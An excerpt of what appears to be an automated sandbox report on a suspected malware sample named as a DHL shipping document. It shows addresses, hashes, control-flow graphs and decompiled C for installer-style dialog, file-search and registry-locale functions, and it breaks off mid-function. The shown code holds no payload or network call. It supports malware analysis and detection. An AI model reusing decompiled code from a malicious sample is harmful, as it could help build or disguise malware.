                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x00000000
                                                              0x00407390
                                                              0x0040738e
                                                              0x004075c3
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                              • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                              • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                              • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                                                              0x004069a9
                                                              0x004069b2
                                                              0x00000000
                                                              0x004069bf
                                                              0x004069b5
                                                              0x00000000

                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(7476FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560), ref: 004069A9
                                                              • FindClose.KERNEL32(00000000), ref: 004069B5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                              • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                              • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                              • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                                              C-Code - Quality: 84%
                                                              			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                                                              0x004040d0
                                                              0x004040d7
                                                              0x0040423e
                                                              0x00404242
                                                              0x00404246
                                                              0x00404248
                                                              0x0040424d
                                                              0x00404258
                                                              0x00404263
                                                              0x00404268
                                                              0x0040426a
                                                              0x0040426c
                                                              0x0040426f
                                                              0x00404274
                                                              0x00404282
                                                              0x0040428f
                                                              0x00404296
                                                              0x00404296
                                                              0x00404297
                                                              0x00404297
                                                              0x0040429c
                                                              0x004042a2
                                                              0x004042a9
                                                              0x004042af
                                                              0x004042b1
                                                              0x004042f1
                                                              0x004042f6
                                                              0x004042fb
                                                              0x004042fb
                                                              0x00404300
                                                              0x00404309
                                                              0x0040430b
                                                              0x00404310
                                                              0x00404316
                                                              0x0040431a
                                                              0x0040431a
                                                              0x0040431f
                                                              0x00404325
                                                              0x00000000
                                                              0x00000000
                                                              0x00404330
                                                              0x00404336
                                                              0x00000000
                                                              0x00000000
                                                              0x0040433f
                                                              0x00404347
                                                              0x0040434c
                                                              0x0040434f
                                                              0x00404355
                                                              0x0040435a
                                                              0x0040435d
                                                              0x00404363
                                                              0x00404368
                                                              0x0040436b
                                                              0x00404371
                                                              0x00404379
                                                              0x0040437f
                                                              0x00404385
                                                              0x00404389
                                                              0x00404390
                                                              0x00404390
                                                              0x00404390
                                                              0x0040439a
                                                              0x004043ac
                                                              0x004043b8
                                                              0x004043bd
                                                              0x004043c7
                                                              0x004043cd
                                                              0x004043cf
                                                              0x004043d4
                                                              0x004043d1
                                                              0x004043d1
                                                              0x004043d1
                                                              0x004043e4
                                                              0x004043fc
                                                              0x004043fe
                                                              0x00404404
                                                              0x00404419
                                                              0x00404406
                                                              0x0040440f
                                                              0x00404411
                                                              0x00404411
                                                              0x0040441f
                                                              0x00404430
                                                              0x00404446
                                                              0x0040444d
                                                              0x00404453
                                                              0x00404457
                                                              0x0040445c
                                                              0x0040445e
                                                              0x00000000
                                                              0x00404464
                                                              0x00404464
                                                              0x00404466
                                                              0x00000000
                                                              0x00000000
                                                              0x0040446c
                                                              0x00404470
                                                              0x00404495
                                                              0x0040449b
                                                              0x004044a1
                                                              0x004044a3
                                                              0x00000000
                                                              0x00000000
                                                              0x004044c9
                                                              0x004044cf
                                                              0x004044d1
                                                              0x004044d6
                                                              0x00000000
                                                              0x00000000
                                                              0x004044dc
                                                              0x004044df
                                                              0x004044e2
                                                              0x004044f9
                                                              0x00404505
                                                              0x0040451e
                                                              0x00404524
                                                              0x00404528
                                                              0x0040452d
                                                              0x00404533
                                                              0x00000000
                                                              0x00000000
                                                              0x0040453d
                                                              0x00404548
                                                              0x00000000
                                                              0x00404548
                                                              0x00404472
                                                              0x00404478
                                                              0x00000000
                                                              0x00000000
                                                              0x0040447e
                                                              0x00404484
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040448a
                                                              0x0040445e
                                                              0x00404555
                                                              0x00404561
                                                              0x00404568
                                                              0x00000000
                                                              0x004042b3
                                                              0x004042b3
                                                              0x004042b6
                                                              0x004042e9
                                                              0x004042e9
                                                              0x004042eb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004042eb
                                                              0x004042b8
                                                              0x004042bc
                                                              0x004042c1
                                                              0x004042c3
                                                              0x00000000
                                                              0x00000000
                                                              0x004042d3
                                                              0x004042db
                                                              0x00000000
                                                              0x004042e1
                                                              0x004040e9
                                                              0x004040e9
                                                              0x004040ed
                                                              0x004040f2
                                                              0x00404101
                                                              0x00404101
                                                              0x00404107
                                                              0x0040410e
                                                              0x00404152
                                                              0x00404158
                                                              0x00404171
                                                              0x00404174
                                                              0x00404187
                                                              0x0040418d
                                                              0x00000000
                                                              0x00000000
                                                              0x00404193
                                                              0x0040419e
                                                              0x004041a0
                                                              0x004041a2
                                                              0x004041c1
                                                              0x004041c1
                                                              0x004041c4
                                                              0x004041c9
                                                              0x004041cc
                                                              0x004041dc
                                                              0x004041dd
                                                              0x004041df
                                                              0x00404215
                                                              0x00404225
                                                              0x00000000
                                                              0x00404225
                                                              0x004041e1
                                                              0x004041e7
                                                              0x00404200
                                                              0x00404205
                                                              0x00404207
                                                              0x00000000
                                                              0x00000000
                                                              0x00404209
                                                              0x004041f5
                                                              0x004041f5
                                                              0x004041f7
                                                              0x004041f7
                                                              0x00000000
                                                              0x004041f7
                                                              0x004041ea
                                                              0x004041ef
                                                              0x00000000
                                                              0x004041ef
                                                              0x004041ce
                                                              0x004041d4
                                                              0x00000000
                                                              0x00000000
                                                              0x004041d6
                                                              0x00000000
                                                              0x004041d6
                                                              0x004041c6
                                                              0x00000000
                                                              0x004041c6
                                                              0x004041ac
                                                              0x004041b3
                                                              0x004041b9
                                                              0x004041bb
                                                              0x00404591
                                                              0x00000000
                                                              0x00404591
                                                              0x00000000
                                                              0x004041bb
                                                              0x00404179
                                                              0x00000000
                                                              0x00404181
                                                              0x00404160
                                                              0x00404166
                                                              0x0040456e
                                                              0x0040456e
                                                              0x00404574
                                                              0x00404581
                                                              0x00404587
                                                              0x00404587
                                                              0x00000000
                                                              0x00404110
                                                              0x00404115
                                                              0x00404121
                                                              0x0040412a
                                                              0x0040422b
                                                              0x00000000
                                                              0x00404149
                                                              0x0040414c
                                                              0x00000000
                                                              0x0040414c
                                                              0x0040412a
                                                              0x0040410e

                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                              • ShowWindow.USER32(?), ref: 00404121
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                              • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                              • DestroyWindow.USER32 ref: 00404160
                                                              • SetWindowLongW.USER32 ref: 00404179
                                                              • GetDlgItem.USER32 ref: 00404198
                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                              • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                              • GetDlgItem.USER32 ref: 0040425E
                                                              • GetDlgItem.USER32 ref: 00404268
                                                              • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                              • GetDlgItem.USER32 ref: 00404379
                                                              • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                              • EnableWindow.USER32(?,?), ref: 004043AC
                                                              • EnableWindow.USER32(?,?), ref: 004043C7
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                              • EnableMenuItem.USER32 ref: 004043E4
                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                              • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                              • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                              • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                              • String ID: H7B
                                                              • API String ID: 2475350683-2300413410
                                                              • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                              • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                              • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                              • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                                              C-Code - Quality: 96%
                                                              			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
